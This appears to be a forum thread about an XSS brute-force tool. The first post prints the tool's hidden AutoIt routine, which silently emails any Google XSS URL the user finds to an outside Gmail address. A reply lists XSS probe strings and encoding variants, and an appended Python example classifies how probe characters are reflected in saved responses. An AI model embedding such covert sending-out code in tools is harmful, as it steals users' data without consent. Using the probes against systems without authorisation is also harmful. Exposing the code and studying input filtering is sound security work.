tudor13mn13

What do you think about an XSS-Brute?


This is why it is detected as a virus:

If WinExists("[CLASS:#32770]") Then
    $hwnd = WinGetHandle("[CLASS:#32770]")
    $aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hwnd, "int", -16)
    $Style = Hex($aStyle[0])
    $String = StringCompare($Style, "94C801C5")
    If $String = 1 Then
        $Ini_read = IniRead(@ScriptDir & "\XSS.ini", "XSS", "Url", "")
        If StringInStr($Ini_read, "Google") > 0 Then
            $SmtpServer = "smtp.gmail.com"
            $FromName = "XSS Catcher"
            $FromAddress = "xss.catcher@gmail.com"
            $ToAddress = "xss@gmail.com"
            $Subject = "New Google XSS from " & $Pc_Name
            $Body = $Ini_read
            $AttachFiles = ""
            $CcAddress = ""
            $BccAddress = ""
            $Importance = "Normal"
            $Username = "asdf"
            $Password = "asdf"
            $IPPort = 465
            $ssl = 1

            $rc = _INetSmtpMailCom($SmtpServer, $FromName, $FromAddress, $ToAddress, $Subject, $Body, $AttachFiles, $CcAddress, $BccAddress, $Importance, $Username, $Password, $IPPort, $ssl)

Anyway, I didn't catch anything... :P

Edited by Jimmy

I think it would be much more useful to design it differently.

It's rather pointless to have a list of vectors and brute-force them (from my point of view). You don't see the application's behaviour.

You could build the program so that it sees which characters are not filtered, and at the end gives you a report listing those characters. With that report in hand, you sit down and think about how to get something out of it.

For example, the first attempts could be:

vector = 't3st1234

vector = "t3st1234

vector = <t3st1234 or vector = t3st1234<

vector = >t3st1234 or vector = t3st1234>

You parse the server's response up to t3st1234 and see what happened to ' " > <.

..........

Encode %22 %27 %3e %3c, or double encode %2522 %2527 %253e %253c, or HTML encode a....

..........

At the end it should give you a report stating a risk level according to its own methodology. Based on that risk level you decide whether it is worth doing something manually or not.

Congratulations on the work you put into developing this tool. It's good to work on projects like this.

No offence, but I see things differently and I don't think a tool like this could help me.

Edited by mah_one
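
The reflection check described in the post above, as an added example that is not code from the thread or from the tool under discussion: it takes the response body returned for each probe (character placed directly before the t3st1234 marker) and reports how that character came back. The function names and the sample response bodies are constructed for illustration, and the analysis runs offline on bodies you have already collected from an application you are testing.

```python
import html
import re

MARKER = "t3st1234"  # marker string taken from the post

def encoded_forms(char):
    """Lower-case HTML-entity spellings of one probe character."""
    return {html.escape(char, quote=True).lower(),
            f"&#{ord(char)};", f"&#x{ord(char):x};"}

def classify(char, body, marker=MARKER):
    """How did `char`, sent directly before `marker`, come back in `body`?
    One verdict per reflection, since a page can echo input in several places."""
    verdicts = []
    for m in re.finditer(re.escape(marker), body):
        before = body[max(0, m.start() - 8):m.start()]
        low = before.lower()
        if before.endswith("\\" + char):
            verdicts.append("backslash-escaped")
        elif before.endswith(char):
            # Caveat: markup the page itself emits right before the
            # reflection (e.g. a tag's closing '>') also matches here.
            verdicts.append("raw")
        elif any(low.endswith(e) for e in encoded_forms(char)):
            verdicts.append("html-encoded")
        elif low.endswith(f"%{ord(char):02x}"):
            verdicts.append("url-encoded")
        else:
            verdicts.append("stripped-or-replaced")
    return verdicts or ["not reflected"]

def build_report(responses):
    """responses maps each probe character to the body returned for it."""
    return {c: classify(c, b) for c, b in responses.items()}

def unfiltered(report):
    """Characters that came back raw in at least one reflection."""
    return sorted(c for c, v in report.items() if "raw" in v)

# Constructed response bodies (not captured from any real site).
SAMPLE = {
    "'": "<input value='&#39;t3st1234'>",
    '"': '<input value="&quot;t3st1234"><script>var q="\\"t3st1234";</script>',
    "<": "<p>You searched for <t3st1234</p>",
    ">": "<p>Results for: t3st1234</p>",
}

if __name__ == "__main__":
    for ch, verdict in build_report(SAMPLE).items():
        print(repr(ch), verdict)
    print("unfiltered:", unfiltered(build_report(SAMPLE)))
```

Characters reported as raw are the ones whose output encoding needs fixing at that reflection point; the per-reflection list shows when the same input is handled differently in different parts of the page.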